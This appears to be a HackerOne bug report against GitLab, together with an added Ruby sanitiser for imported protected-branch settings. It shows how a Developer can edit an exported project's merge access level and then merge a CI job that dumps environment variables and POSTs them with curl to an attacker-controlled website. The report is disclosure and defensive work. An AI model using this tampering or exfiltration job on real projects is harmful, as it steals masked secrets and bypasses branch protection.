User with developer role (group) can modify Protected branches -> Allowed to merge setting on imported project
HackerOne report #1485381 by justas_b
on 2022-02-18, assigned to @nmalcolm:
Report
Hello,
Summary
A user with the Developer role in a group can steal masked group/project CI/CD variables by modifying the Project settings -> Protected branches -> Allowed to merge setting on an imported project (via the tree/project/protected_branches.ndjson file in the export).
Steps to reproduce
- Create 2 accounts
- Create a group with account A and add masked CI/CD group variables (Group settings -> CI/CD -> Variables)
- Create a personal project with account B and export it
- Invite account B (Developer) to account A's (Owner) group
- With account B, modify the project export file: open tree/project/protected_branches.ndjson
- Change the "merge_access_levels":[{"access_level":}] value to 30 if it is 40
- Upload the modified project to account A's group with account B
- By default, only Maintainers are allowed to merge into protected branches ("merge_access_levels":[{"access_level":}] is 40; 40 = Maintainer, 30 = Developer, etc.)
- Create a new branch with account B (Developer)
- Add the following .gitlab-ci.yml file to the newly created branch and create a merge request

```yaml
image: ruby:latest
job_name2:
  script:
    - export > test.txt
    - curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)
```

[REDACTED]
- Merge the newly created branch into the main (protected) branch (with account B, Developer)
- A pipeline run against a protected branch will send sensitive data to the attacker's website using curl
[REDACTED]
The impact is pretty similar to my other report #1256017
What is the current bug behavior?
It is possible to modify the "merge_access_levels":[{"access_level":}] value on imported projects
What is the expected correct behavior?
The "merge_access_levels":[{"access_level":}] value should always be the default, 40
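One way a receiving side can enforce that expectation while reading tree/project/protected_branches.ndjson, shown here as an added example that is neither GitLab's own importer code nor the reporter's: each line is parsed as JSON, and any merge or push access level that sits between "no one" (0) and Maintainer (40) is reset to 40 and reported, so an edited export cannot grant Developers merge rights on a protected branch. The sample ndjson lines, the constant names and the function name `sanitise_protected_branches` are constructed for this example.

```ruby
require 'json'

# GitLab access levels referenced in the report: 40 = Maintainer, 30 = Developer.
# 0 ("no one") is also a valid, stricter setting for a protected branch.
NO_ACCESS  = 0
DEVELOPER  = 30
MAINTAINER = 40

# Constructed sample of tree/project/protected_branches.ndjson (one JSON object
# per line). The first line is the tampered case from the report (merge level 30).
SAMPLE_NDJSON = <<~NDJSON
  {"name":"main","merge_access_levels":[{"access_level":30}],"push_access_levels":[{"access_level":40}]}
  {"name":"release/*","merge_access_levels":[{"access_level":40}],"push_access_levels":[{"access_level":40}]}
  {"name":"hotfix/*","merge_access_levels":[{"access_level":40}],"push_access_levels":[{"access_level":0}]}
NDJSON

# Reads ndjson text and returns [sanitised_lines, findings].
# Any access level strictly between NO_ACCESS and MAINTAINER is raised to
# MAINTAINER and recorded, so an export edited to grant Developers merge or
# push rights on a protected branch is neutralised before the branch is created.
# Lines that are not valid JSON are dropped and reported rather than imported.
def sanitise_protected_branches(ndjson)
  findings = []
  sanitised = []
  ndjson.each_line.with_index(1) do |raw, lineno|
    line = raw.strip
    next if line.empty?
    begin
      branch = JSON.parse(line)
    rescue JSON::ParserError => e
      findings << "line #{lineno}: unparsable JSON dropped (#{e.message})"
      next
    end
    %w[merge_access_levels push_access_levels].each do |key|
      Array(branch[key]).each do |entry|
        next unless entry.is_a?(Hash)
        raw_level = entry['access_level']
        next if raw_level.nil?
        # Coerce strings such as "30" too; anything non-numeric is left alone.
        level = Integer(raw_level, exception: false)
        next if level.nil? || level == NO_ACCESS || level >= MAINTAINER
        findings << "#{branch['name']}: #{key} access_level #{level} (below Maintainer), reset to #{MAINTAINER}"
        entry['access_level'] = MAINTAINER
      end
    end
    sanitised << JSON.generate(branch)
  end
  [sanitised, findings]
end

if __FILE__ == $PROGRAM_NAME
  lines, findings = sanitise_protected_branches(SAMPLE_NDJSON)
  puts lines
  puts findings
end
```

Running the file prints the three normalised lines and a single finding for `main`, whose merge level 30 is raised back to 40; the `hotfix/*` push level of 0 ("no one") is left untouched because it is stricter, not weaker, than the default.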
Relevant logs and/or screenshots
Output of checks
This bug happens on GitLab.com
Impact
A user with the Developer role in a group can steal masked group and project CI/CD variables. A Developer can also modify the main branch without a Maintainer's permission.